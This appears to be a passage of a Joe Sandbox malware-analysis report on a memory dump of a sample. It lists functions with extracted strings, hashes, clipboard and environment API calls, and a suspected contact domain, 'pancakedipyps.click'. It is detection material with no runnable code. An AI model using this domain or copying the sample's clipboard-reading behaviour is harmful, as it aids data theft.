Instruction ID: 8ebcec6048e81b7414bf2c44ea1e9f7dace67e943cef4cf10300ed7be7304af5
Opcode Fuzzy Hash: d34ec39eb96bb7efa42d43d0cecc10ce8a4047bc9737a28ca6cdc305126fa738
Instruction Fuzzy Hash: D1B273B160C3918BD334CF14D8417ABBBF2FB95304F44892DD4C99B252D7798A4ADB8A

Function 00417222 Relevance: 25.6, APIs: 4, Strings: 10, Instructions: 1137COMMON

Download Yara Rule

Strings

*, xrefs: 00418053
7, xrefs: 00417D7E
pA, xrefs: 004176B7
TW, xrefs: 00417D76
>gVf, xrefs: 00417278, 004172A4
), xrefs: 0041747C
WH, xrefs: 00417D6E
}&'$, xrefs: 00417BD7
ruA, xrefs: 0041755F
X2c0, xrefs: 00417775

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: pA$)$*$7$>gVf$TW$WH$X2c0$ruA$}&'$
API String ID: 0-2465278142
Opcode ID: 066c8ce5b71a5b696cd3803d73cf449c38db815dbdda3cc7b9b4004b6f854aec
Instruction ID: db295268db8bdf45a891635b6dee4b286def9570c954afad4e7b9bb962e3f9ad
Opcode Fuzzy Hash: 066c8ce5b71a5b696cd3803d73cf449c38db815dbdda3cc7b9b4004b6f854aec
Instruction Fuzzy Hash: 947211756483528BD324CF28C8917ABBBF1FF95314F18896DE4C58B3A1E7388945CB86

Function 0041618C Relevance: 14.8, Strings: 11, Instructions: 1044COMMON

Download Yara Rule

Strings

pSlM, xrefs: 00416406
6, xrefs: 00416C5B
{, xrefs: 00416299
YjM, xrefs: 00416B56
y~, xrefs: 00416283
EnA, xrefs: 00416E3F
fjM, xrefs: 00416BB3
yx, xrefs: 0041628E
fjM, xrefs: 00416B0D
YjM, xrefs: 00416BF6
6y, xrefs: 00416278

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: 6$6y$EnA$YjM$YjM$fjM$fjM$pSlM$yx$y~${
API String ID: 0-2342033412
Opcode ID: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
Instruction ID: a2001c8a8adb2b8dbf3dd01cda6d968c98786edfc2a21b29c8f54ffb17cc71b7
Opcode Fuzzy Hash: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
Instruction Fuzzy Hash: 9762E3741083418FE724CF25C891BAB77E1FF86314F15496DE0D69B2A2D738D84ACB9A

Function 00411BDE Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 555COMMON

Download Yara Rule

Strings

J, xrefs: 00411BF1
5, xrefs: 0041219B
$, xrefs: 0041203F
t, xrefs: 00411C84
A, xrefs: 00411FB9
&, xrefs: 00412044

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: $$&$5$A$J$t
API String ID: 0-1619763526
Opcode ID: 2bdb521bc7c73c0b7c7245bb86837fa704f627e98ff44684887737040ddb6845
Instruction ID: a53242e4cf12c94eabb5fc35352f39a952aaa25ff7b8dface19663bb3d57fcdd
Opcode Fuzzy Hash: 2bdb521bc7c73c0b7c7245bb86837fa704f627e98ff44684887737040ddb6845
Instruction Fuzzy Hash: FB22B07160C7808BC7249B38C5943AFBBE1ABC5324F184A2EE9E9D73C1D77889458B47

Function 00409B70 Relevance: 11.7, Strings: 9, Instructions: 418COMMON

Download Yara Rule

Strings

W, xrefs: 00409C13
~9, xrefs: 00409F05
b, xrefs: 00409E73
EVA^, xrefs: 00409D89
]NGD, xrefs: 00409D94
VW, xrefs: 00409F9D
12F5927179D0FDD2822D1F4978021086, xrefs: 00409C45
UJVM, xrefs: 00409D7E
yD, xrefs: 00409CEB

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: 12F5927179D0FDD2822D1F4978021086$EVA^$UJVM$VW$W$]NGD$b$~9$yD
API String ID: 0-1992629003
Opcode ID: 63948a1a35424d92484af45aa3e419c807616ca0303279be93579cff46dd4037
Instruction ID: ffcda9fbc27d5fd1cec50cde84d534a082da3ff5d4e5b8e77816747385cb8e1d
Opcode Fuzzy Hash: 63948a1a35424d92484af45aa3e419c807616ca0303279be93579cff46dd4037
Instruction Fuzzy Hash: 82E1D1715083808BD724CF24C8947ABBBE2FFD5308F08892DE4D99B392DB798509CB56

Function 0040B280 Relevance: 10.4, Strings: 8, Instructions: 384COMMON

Download Yara Rule

Strings

DM_e, xrefs: 0040B362, 0040B513
SV, xrefs: 0040B66F
)Ku, xrefs: 0040B43B
S;G%, xrefs: 0040B3DB
ox}k, xrefs: 0040B550, 0040B76C, 0040B742, 0040B695, 0040B725, 0040B5A4, 0040B6A6, 0040B739, 0040B6B2
UGEA, xrefs: 0040B292
x[G, xrefs: 0040B350
c[G, xrefs: 0040B2BB

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: )Ku$DM_e$S;G%$SV$UGEA$c[G$ox}k$x[G
API String ID: 0-3323421312
Opcode ID: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
Instruction ID: 7fd46061e40033794bbc6c3ce90a1e611a10dbdcf815d020572bc93dee4dedaf
Opcode Fuzzy Hash: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
Instruction Fuzzy Hash: 55D1F57150C3408BD724CF29845476BFBE2EFD1708F18896DE4D56B385D77A890A8B8B

Function 00409360 Relevance: 10.3, Strings: 8, Instructions: 272COMMON

Download Yara Rule

Strings

ADTD, xrefs: 00409428
Y, xrefs: 004094DE
eMOK, xrefs: 004093F0
E, xrefs: 00409388
|xzy, xrefs: 00409438
vu, xrefs: 004094D7
ID, xrefs: 004093E2
vxtq, xrefs: 00409440

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: ADTD$E$ID$Y$eMOK$vu$vxtq$|xzy
API String ID: 0-1466227541
Opcode ID: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
Instruction ID: 68c016febbe7a0715404e25fe2d2c1f5bf377f828986e49a58439a2b7b357855
Opcode Fuzzy Hash: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
Instruction Fuzzy Hash: 7871E23158C3928AD3118F7AC4A076BFFE09FA2350F1C496DE4D45B392D37989099B9A

Function 0042A7F0 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 573COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042A8F7
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042A9CF

Strings

*, xrefs: 0042AB95, 0042AA60, 0042AA93
q, xrefs: 0042ADA6
*, xrefs: 0042AC00

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: *$*$q
API String ID: 237503144-4001757600
Opcode ID: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
Instruction ID: 6a2a75fc59155a11c5aec0aea031f7e0da65668b1aff7312ce30b4a80edc4f4b
Opcode Fuzzy Hash: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
Instruction Fuzzy Hash: 130212B56083158FD724CF28D89135FB7E1FFC5308F05892DE9999B291DB78890ACB86

Function 00409660 Relevance: 9.2, Strings: 7, Instructions: 448COMMON

Download Yara Rule

Strings

$i|3, xrefs: 00409811
4?!;, xrefs: 004097F1
?+9&, xrefs: 00409809
K, xrefs: 00409A9E
9;#&, xrefs: 00409801
6?34, xrefs: 004096B0
)--l, xrefs: 00409819

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: $i|3$)--l$4?!;$6?34$9;#&$?+9&$K
API String ID: 0-2829372548
Opcode ID: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
Instruction ID: 6807048b151084a9e8e11973f3dfbc4b5eda1ab4f65a555cc9214e5bb2479a1e
Opcode Fuzzy Hash: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
Instruction Fuzzy Hash: 2DD1247120C7818BD729CF29C45036BBFE1AB97314F0889AED0D5DB382DA3D8909C756

Function 00437A60 Relevance: 9.1, APIs: 6, Instructions: 119clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00437A74
GetClipboardData.USER32 ref: 00437A8F
GlobalLock.KERNEL32 ref: 00437AAE
GlobalUnlock.KERNEL32 ref: 00437BE6
CloseClipboard.USER32 ref: 00437BF1

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
Instruction ID: cc871ad810d5ebcc8503e7b8c4c024891cf7c86b0654bd3a3462fcbae073f9f9
Opcode Fuzzy Hash: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
Instruction Fuzzy Hash: 0B41ABB010C7818FE310EF78944936FBFE0AB96308F09496EE4C586282D67C858DD7A7

Function 0043C6C0 Relevance: 9.1, Strings: 7, Instructions: 361COMMON

Download Yara Rule

Strings

g, xrefs: 0043C9A0
>, xrefs: 0043CA51
O, xrefs: 0043C99B
A, xrefs: 0043C996
j, xrefs: 0043CA56
f, xrefs: 0043CA5B
q, xrefs: 0043C991

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: >$A$O$f$g$j$q
API String ID: 0-654885204
Opcode ID: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
Instruction ID: 933c444832a5593444b97503960d5bfec1f1b34db4cd747dab4759e8adc9f3c2
Opcode Fuzzy Hash: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
Instruction Fuzzy Hash: DAD1F633A0C7D04AD324853C889535BAEC25BE6324F1D8B7EE9F5973C6D66D88068357

Function 00428B10 Relevance: 8.0, Strings: 6, Instructions: 513COMMON

Download Yara Rule

Strings

LUC_, xrefs: 00429A17
x}{z, xrefs: 00429A3F
J[, xrefs: 0042954C
Gt, xrefs: 0042953C
|A, xrefs: 00429544
we`k, xrefs: 00429A2F

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: Gt$J[$LUC_$we`k$x}{z$|A
API String ID: 0-4062276182
Opcode ID: a80706b1bcf71f0eeb055f17b4aa1439f32228796d62799fc01b238a482912c0
Instruction ID: f20c1733954f3d7476a331e7578cdc678171662c1333d6829e8b94656b24469a
Opcode Fuzzy Hash: a80706b1bcf71f0eeb055f17b4aa1439f32228796d62799fc01b238a482912c0
Instruction Fuzzy Hash: 080200B5A08350CBD3209F25D84176BBBE2FFC6318F454A6DE5C85B390DB799805CB8A

Function 004042C0 Relevance: 6.7, Strings: 5, Instructions: 465COMMON

Download Yara Rule

Strings

IDAT, xrefs: 0040472B
), xrefs: 0040433D
), xrefs: 00404347
IHDR, xrefs: 004046BC
IEND, xrefs: 0040479F

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: )$)$IDAT$IEND$IHDR
API String ID: 0-3469842109
Opcode ID: 5f911fd9eadcc5316ebe90ac87000dbf8232f8441ecf4be1dd311271e7b63a2a
Instruction ID: 828f2798e7534a509cb653a25c5a447f63e0741c52f375536a6b9b324fae408e
Opcode Fuzzy Hash: 5f911fd9eadcc5316ebe90ac87000dbf8232f8441ecf4be1dd311271e7b63a2a
Instruction Fuzzy Hash: 5E02E3B46043808FD700DF29D89075ABBE1EBD6304F05897EEA859B3D1D379D909CB96

Function 00419B30 Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 947COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00419FF7
FreeLibrary.KERNEL32(?), ref: 0041A039

Part of subcall function 00442080: LdrInitializeThunk.NTDLL(0044523A,?,00000018,?,?,00000018,?,?,?), ref: 004420AE

Strings

mj, xrefs: 00419F08

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: mj
API String ID: 764372645-1022201683
Opcode ID: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
Instruction ID: e4b45be28fd4c7cbff433e2c06fe463db16693d42f5f124cafcdabba2620905a
Opcode Fuzzy Hash: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
Instruction Fuzzy Hash: D76223746093009FE724CF25CC507ABBBE2BB85318F24861EE594573A1E7399C96CB4B

Function 00425DA0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00425E98
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00425F24

Strings

23, xrefs: 00425E1F

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 23
API String ID: 237503144-326707096
Opcode ID: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
Instruction ID: b6730ddf130f4e2a19c05504fd255247e3d11648143caf2c2a016be5e81be571
Opcode Fuzzy Hash: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
Instruction Fuzzy Hash: 7B7112B1A043189FEB20CFA8D841BEEBBB1FB45304F10843DE905AB2C5D775590ACB89

Function 00429917 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A

Strings

67, xrefs: 00429C0E

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 67
API String ID: 237503144-1886922373
Opcode ID: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
Instruction ID: a5821a17d697f7f316c5e23e8fd2eb7e472b5f5b3478a77b5a5598d7e69c89e3
Opcode Fuzzy Hash: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
Instruction Fuzzy Hash: 6D61F0B66083408BD724DF29E88175FB7E1EBC9304F18493DE58997281DB35D905CB8A

Function 00429B7B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A

Strings

67, xrefs: 00429C0E

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 67
API String ID: 237503144-1886922373
Opcode ID: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
Instruction ID: 7ba92da05bbbaddbc1e3305b36c9b0db2ded0e94f959a81563e8173db3a816b3
Opcode Fuzzy Hash: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
Instruction Fuzzy Hash: A961FEB66083408FD724DF25D88176FBBE2EBC9304F19493DE5898B281DB75C805CB8A

Function 00427FC0 Relevance: 5.4, Strings: 4, Instructions: 431COMMON

Download Yara Rule

Strings

@-, xrefs: 0042814C
vC, xrefs: 00428162
up, xrefs: 00428157
#C}, xrefs: 00428438

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: #C}$@-$up$vC
API String ID: 0-3794437364
Opcode ID: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
Instruction ID: 145fb0a50be3e303ead08e2671ce65b3aa3df702a645c1f6ac8533401e1fa356
Opcode Fuzzy Hash: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
Instruction Fuzzy Hash: 9FE1EBB5209340DFE324DF25E88076FBBE1FB86304F54882EE5898B251DB35D945CB9A

Function 0041906A Relevance: 5.3, Strings: 4, Instructions: 328COMMON

Download Yara Rule

Strings

67, xrefs: 00419200
J, xrefs: 004194C6
u, xrefs: 004193AF
wq, xrefs: 00419150

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: 67$J$u$wq
API String ID: 0-4028943437
Opcode ID: 9816c7c8f30c88303995e0134799a24946b230c62976ec73ca8666db259d96e2
Instruction ID: 45cabc22797d8237a69fda20461bdfe49cb428b8aed426b658ce7b40843b0e88
Opcode Fuzzy Hash: 9816c7c8f30c88303995e0134799a24946b230c62976ec73ca8666db259d96e2
Instruction Fuzzy Hash: 2AB176B04483828BD7348F25C4A17EBBBE1EF92314F14892DD8D94B785E7794886CB87

Function 004437D0 Relevance: 4.4, Strings: 3, Instructions: 647COMMON

Download Yara Rule

Strings

M;D, xrefs: 00443AF2
>D, xrefs: 00443ED1
UUK, xrefs: 00443D79

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
Instruction ID: fc75cb93acbb787b45c4a477a4821f2fed63727632898f6dbcded6a89fb42fc6
Opcode Fuzzy Hash: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
Instruction Fuzzy Hash: 8E22FE3AA08310CFD314DF29E89072BB7E2FB8A315F4A887DD58987361E674D941CB85

Function 004438E0 Relevance: 4.3, Strings: 3, Instructions: 577COMMON

Download Yara Rule

Strings

M;D, xrefs: 00443AF2
>D, xrefs: 00443ED1
UUK, xrefs: 00443D79

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
Instruction ID: 5b6f0a5fe011b24c48fd64f61fb35041aa1557f3f4dce62c9b8353607a503f3b
Opcode Fuzzy Hash: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
Instruction Fuzzy Hash: 5402DD39A08310CFE314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85

Function 004438FB Relevance: 4.3, Strings: 3, Instructions: 566COMMON

Download Yara Rule

Strings

M;D, xrefs: 00443AF2
>D, xrefs: 00443ED1
UUK, xrefs: 00443D79

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
Instruction ID: 0ffe7b29edef83b041ea382641fdc4149dbc112461c51243b49d827887b3597f
Opcode Fuzzy Hash: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
Instruction Fuzzy Hash: 2202DD3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A2D675D945CB85

Function 004438F9 Relevance: 4.3, Strings: 3, Instructions: 565COMMON

Download Yara Rule

Strings

M;D, xrefs: 00443AF2
>D, xrefs: 00443ED1
UUK, xrefs: 00443D79

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: f19334b376416346e53576ffb4c07c93724e4cf39114a0a055eb46b0a26280a2
Instruction ID: 86640fba6bac160b05b0c43110ab63d66e8f7ec2f5acf9dcdae8f0d28c6b6e57
Opcode Fuzzy Hash: f19334b376416346e53576ffb4c07c93724e4cf39114a0a055eb46b0a26280a2
Instruction Fuzzy Hash: 8002ED3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85

Function 00440B00 Relevance: 4.3, Strings: 3, Instructions: 555COMMON

Download Yara Rule

Strings

f, xrefs: 00440DAA
S"(w, xrefs: 00440BF0
S"(w, xrefs: 00440E4F

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: InitializeThunk
String ID: S"(w$S"(w$f
API String ID: 2994545307-891790955
Opcode ID: 28c41b0127d726451ed3b83d71238d17b12bdb257359ab4ca56fde3cc06b6e27
Instruction ID: 3cfac3c3f928c660201977811b78d3d3052ee887d4b0c26ff85acd92e20ac89e
Opcode Fuzzy Hash: 28c41b0127d726451ed3b83d71238d17b12bdb257359ab4ca56fde3cc06b6e27
Instruction Fuzzy Hash: B412E1756083508FE324CF19C880B2BBBE1BBC9314F148A6EE9D45B3A1D775AC45CB96

Function 00443A30 Relevance: 4.2, Strings: 3, Instructions: 488COMMON

Download Yara Rule

Strings

M;D, xrefs: 00443AF2
>D, xrefs: 00443ED1
UUK, xrefs: 00443D79

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: 20f685b36d0ed9b593ab140bfc3a35f81c9690bbd879fe733f4b8e7e4bc2cfe5
Instruction ID: 631fa3f1d4c0726364ceec28ad2e892877ef6bcbce7aa5fcc49a4e7daf9cf800
Opcode Fuzzy Hash: 20f685b36d0ed9b593ab140bfc3a35f81c9690bbd879fe733f4b8e7e4bc2cfe5
Instruction Fuzzy Hash: DAE1FE39B09321CFD304DF29D89072AB7E2FB9A311F4A887DD589873A2D634D941CB85

Function 004239EB Relevance: 4.2, Strings: 3, Instructions: 458COMMON

Download Yara Rule

Strings

pancakedipyps.click, xrefs: 00424034
12F5927179D0FDD2822D1F4978021086, xrefs: 00423CE9
yD, xrefs: 00423BFC

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: 12F5927179D0FDD2822D1F4978021086$pancakedipyps.click$yD
API String ID: 0-2775505739
Opcode ID: 9f06e29270f24890e1894be452b6b26ef11b3f3b9a52aa199204e3ccf518dae8
Instruction ID: ea6ce95d3b2e4101921536522c50bf2979d69fc2778ed717b5a7399473229c95
Opcode Fuzzy Hash: 9f06e29270f24890e1894be452b6b26ef11b3f3b9a52aa199204e3ccf518dae8
Instruction Fuzzy Hash: BF322951608BD28DD326CB7C8848355BF912B27228F1C87DDD1E94F3D3D2AA8587C7A6

Function 00422370 Relevance: 4.2, Strings: 3, Instructions: 457COMMON

Download Yara Rule

Strings

-jkhanold~m`, xrefs: 004224CE
d~m`, xrefs: 004224B5
anold~m`, xrefs: 004224DA

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: -jkhanold~m`$anold~m`$d~m`
API String ID: 0-185452761
Opcode ID: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
Instruction ID: c4d8edb6bc4b196318c262ba746bf01715a487006edf2819d48878c0ea44a364
Opcode Fuzzy Hash: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
Instruction Fuzzy Hash: C8D1BBB06083509FD710DF68D892B6BBBE0FF85318F54491DE8958B392E7B8D809CB56

Function 00443AC0 Relevance: 4.2, Strings: 3, Instructions: 453COMMON

Download Yara Rule

Strings

M;D, xrefs: 00443AF2
>D, xrefs: 00443ED1
UUK, xrefs: 00443D79

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: 09983b5af298ebc2ab7316e1a61d0fcd52d55aeb2db287e4587fee054be01b28
Instruction ID: ab5f315b9e91ee1687aa44fd25e1738b775e8891b6341d15c5394949b1c7dc9f
Opcode Fuzzy Hash: 09983b5af298ebc2ab7316e1a61d0fcd52d55aeb2db287e4587fee054be01b28
Instruction Fuzzy Hash: 53D1FF3AA08310CFD314DF29D89072AB7E2FBDA310F4A897DE58987392D674D941CB85

Function 00421180 Relevance: 4.2, Strings: 3, Instructions: 428COMMON

Download Yara Rule

Strings

8deZ, xrefs: 00421342
<`>f, xrefs: 00421337
567, xrefs: 004216A5

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: 8deZ$<`>f$567
API String ID: 0-937435233
Opcode ID: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
Instruction ID: 754c1abd1b676f1653a7a5478e22f099d0a2726f3b1f9a9f143ecbe85e8fc021
Opcode Fuzzy Hash: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
Instruction Fuzzy Hash: 99D1FFB06083208BD720DF24C851B6BB7F2FFE1354F498A6DE4858B3A5E3799845C756

Function 0043099F Relevance: 4.0, Strings: 3, Instructions: 251COMMON

Download Yara Rule

Strings

QRP,, xrefs: 00430C49
.^Nw, xrefs: 00430C54
ut, xrefs: 00430B4D

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
